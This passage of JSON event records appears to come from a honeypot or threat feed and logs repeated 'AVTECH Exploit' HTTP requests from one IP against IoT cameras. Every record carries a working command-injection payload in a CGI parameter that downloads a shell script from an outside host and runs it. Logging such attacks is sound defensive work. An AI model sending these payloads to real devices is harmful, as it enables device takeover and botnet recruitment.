- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 1388,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:18:27Z",
- "last_seen": "2020-06-01T05:18:27Z"
- },
- {
- "event_id": "8dad686ca57336a9ad489b7a8ad2b961c3acb5db8b7dcf225da55d82de9ece9a",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 3389,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:12:35Z",
- "last_seen": "2020-06-01T05:17:25Z"
- },
- {
- "event_id": "fff8a0bfa9814163865a7eeb8fabf1772215c29695760226c016d7a1b5a6c099",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 16992,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:08:23Z",
- "last_seen": "2020-06-01T05:17:23Z"
- },
- {
- "event_id": "f77f145bada76892a278b75b4dca539f75980b8f59505a9a2db8b7ae83b48edf",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4369,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:15:57Z",
- "last_seen": "2020-06-01T05:17:22Z"
- },
- {
- "event_id": "faa6593615736763aea0f3975f0f88f4f272a952c40a909e3f3f205297dd2295",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 3389,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:12:28Z",
- "last_seen": "2020-06-01T05:17:18Z"
- },
- {
- "event_id": "46ac132826b1648c8ead774835629da0c7a9c80cfc249ff95de4093424f182b0",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 16992,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:08:15Z",
- "last_seen": "2020-06-01T05:17:17Z"
- },
- {
- "event_id": "f3ae750fdb33b96f3d087c1a62c875828a753f834ac505b920db1285033aa597",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4369,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:15:47Z",
- "last_seen": "2020-06-01T05:17:15Z"
- },
- {
- "event_id": "d4d9c95ce93901830aaf44509eaa30fc874d42885a22cc9167fe7fb1f56bdaed",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:01:22Z",
- "last_seen": "2020-06-01T05:17:04Z"
- },
- {
- "event_id": "c6f1708d80dbaa2559765df50d42b4eb6fa5c0bb5435879d436babc62d386080",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:01:14Z",
- "last_seen": "2020-06-01T05:16:59Z"
- },
- {
- "event_id": "b81a75023283645c7be3b4efe0d7408be590239aef4954192debf6b2b4da574d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8089,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:18Z",
- "last_seen": "2020-06-01T05:16:52Z"
- },
- {
- "event_id": "4c11245ab6b148eca33d9f23fa8cd861e83317edbf0abedcf9327a0fd1876e3c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2480,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:04:01Z",
- "last_seen": "2020-06-01T05:16:46Z"
- },
- {
- "event_id": "57aaa55a8a31c6225d8261b7bcf67324250033c9d0ed36491e8b184a1c1f9c33",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:05:23Z",
- "last_seen": "2020-06-01T05:16:43Z"
- },
- {
- "event_id": "f61cd269262fb33c1397dd125e1c66aa455c86d2c3037855531eba2e555f2897",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8089,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:10Z",
- "last_seen": "2020-06-01T05:16:43Z"
- },
- {
- "event_id": "a5658aa44ca3560ee6796c433c96efb2c862b3b6c53836be11150c2c89a9ca0c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2480,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:03:54Z",
- "last_seen": "2020-06-01T05:16:38Z"
- },
- {
- "event_id": "8c89e454daa5ae81cde53dc96551e3f8e527d9e7975707c0945cdc9dfc144e4d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:05:16Z",
- "last_seen": "2020-06-01T05:16:37Z"
- },
- {
- "event_id": "a4968ca8686a1aa6203c8cd9bccdce7c9b02b25293c5d0b0243da547e6d9a0ab",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 50000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:16:10Z",
- "last_seen": "2020-06-01T05:16:11Z"
- },
- {
- "event_id": "54f593bf6608e2c4b52008cba5446d6d0681ab0c18b0a7de1434b8ecdede49cc",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 50000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:16:04Z",
- "last_seen": "2020-06-01T05:16:05Z"
- },
- {
- "event_id": "892549dd6ba6571f43491b7e551dd48b3be343de3640e338bd3944bd658c3dd4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:05:37Z",
- "last_seen": "2020-06-01T05:15:59Z"
- },
- {
- "event_id": "29453013052bca25a8aefa9df5a94e9b259eb5b310e95683c400e7e69e4b4dc4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:04:21Z",
- "last_seen": "2020-06-01T05:15:28Z"
- },
- {
- "event_id": "76008ce60ceea41dbd8d7c93a09078172ad44f406af78b88c09819bbb3735805",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:04:13Z",
- "last_seen": "2020-06-01T05:15:21Z"
- },
- {
- "event_id": "adbb56381605181a192a96c12c350e0b351985b33574bbf8fbc86dca6d535440",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2375,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:08:01Z",
- "last_seen": "2020-06-01T05:14:47Z"
- },
- {
- "event_id": "ab5d616b74a075c5babc523d57f9736eb78f915981b1cbcae8453bc8b0e215f4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2375,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:07:55Z",
- "last_seen": "2020-06-01T05:14:38Z"
- },
- {
- "event_id": "d2cd6c7792ac31ea59c66513d2cd1d91210fb47ee770754dea8fd1e75c44079f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:00:39Z",
- "last_seen": "2020-06-01T05:14:17Z"
- },
- {
- "event_id": "cf2f8f24877ca204dd90e4db808b60b76a73c25586fb152aa8ef927c6366fc0f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:00:32Z",
- "last_seen": "2020-06-01T05:14:09Z"
- },
- {
- "event_id": "7733f8025a2cbf0f612c403994ce8a471e14e0b0b3fef47575c8b76f44d799e4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:01:50Z",
- "last_seen": "2020-06-01T05:12:55Z"
- },
- {
- "event_id": "587d4176ed7ec18faf6a4e73adc1b1d0826554c85b8feb9f54d2423057feb87c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:01:42Z",
- "last_seen": "2020-06-01T05:12:46Z"
- },
- {
- "event_id": "e2bb9b03a7742d1e5320533889ce84851bd470960e9d2efba7b41e9051e0d5d7",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9595,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:11Z",
- "last_seen": "2020-06-01T05:12:40Z"
- },
- {
- "event_id": "64a137d573e693063cb96fd1d70cf4a4441f6ed37c2a1108e3007e238881f69b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9595,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:03Z",
- "last_seen": "2020-06-01T05:12:32Z"
- },
- {
- "event_id": "ceef99a2f167f9774935f6f0293cb07de7e2ba12d1656774859a3a1723649bf9",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5280,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:10:41Z",
- "last_seen": "2020-06-01T05:10:41Z"
- },
- {
- "event_id": "cf3ec70fa68e4c9d946c076436f8ce457ff586d72c5997866a72441c1bf07347",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5280,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:10:33Z",
- "last_seen": "2020-06-01T05:10:33Z"
- },
- {
- "event_id": "84d6015edd3b5339f7c3ac8fc312a496afb23ee0c9c7b7ba03449ec093386d0c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 3791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:10:32Z",
- "last_seen": "2020-06-01T05:10:32Z"
- },
- {
- "event_id": "80da55f6c6b7294f086385b57d6d065f54b4d6faee2bf590d5e7ab0841952a09",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 3791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:10:22Z",
- "last_seen": "2020-06-01T05:10:22Z"
- },
- {
- "event_id": "1f050a6cf85b5a56edf2079c9f8f68cb429a64376c18b6b16d1ce978cae239d0",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:01:01Z",
- "last_seen": "2020-06-01T05:09:04Z"
- },
- {
- "event_id": "ced075a28f055b865478976667c0caaaecb5c017b67d00777ed6239bff897ff6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:00:53Z",
- "last_seen": "2020-06-01T05:08:57Z"
- },
- {
- "event_id": "fb331b68c3a65259bf7ed61c513a30da8a88c5d44ccdb9aa3c131ac4318bdb21",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9100,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:07:16Z",
- "last_seen": "2020-06-01T05:07:16Z"
- },
- {
- "event_id": "0ea03670ac838ba7a865c2927c678007d5208724ba24e6cbaf7e95db20ab0b48",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9100,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:07:08Z",
- "last_seen": "2020-06-01T05:07:08Z"
- },
- {
- "event_id": "cb9cb381e312f842a09f1d5a9a84e4646e1345b26a6344d0f7442e7ff51d1ffa",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4242,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:03:59Z",
- "last_seen": "2020-06-01T05:06:55Z"
- },
- {
- "event_id": "18af7446bfbaa13fc5a3ee3ed51b2f0b0f9839e78b700d15d6b6e72b25f03e62",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4242,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:03:52Z",
- "last_seen": "2020-06-01T05:06:48Z"
- },
- {
- "event_id": "f8285fcc3f01134ce0bb1b4482875dca647e11d018e9983a87e8009df71f0c9f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 10443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
